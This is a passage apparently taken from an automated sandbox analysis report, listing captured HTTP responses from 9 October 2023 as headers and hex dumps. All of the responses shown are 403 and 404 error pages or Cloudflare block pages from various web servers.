68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:09 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:09 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=4, max=349Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:52:09 GMTServer: Apache/2.4.57 (Ubuntu)Content-Length: 273Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 70 6c 75 73 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at workplus.hu Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:52:24 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zljEaepJ4bLM8bnty4R%2Fwhg%2Bv%2FMYho7pvy4B%2BoarKMy33p%2B4peuJsnxa2FDRPuFXI%2F6NAPyf4qDQKWWMOJcoHY7Y%2BSzMW8ln2obWZo433PBQ92jxHIwNvcNSYzPglTk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a3cb83231a3-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compat
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:52:09 GMTContent-Type: text/htmlContent-Length: 75193Connection: keep-aliveVary: Accept-EncodingETag: "65142bc3-125b9"Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:52:25 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3DCN6crt1hqNKUfffrY%2BHAanYixhU7yl06aAqT5fFz9tYsCJauyAfTeoT1%2FeCjp5mw2oL7MVg41%2FQmb3BerQ%2FMhk%2FlMTXerI3tOUtPSy7v7clPhAA5OrzA3qnwsh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371a3eb9852f09-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 15e5<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:09 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=299Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 09 Oct 2023 13:52:10 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:52:11 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20
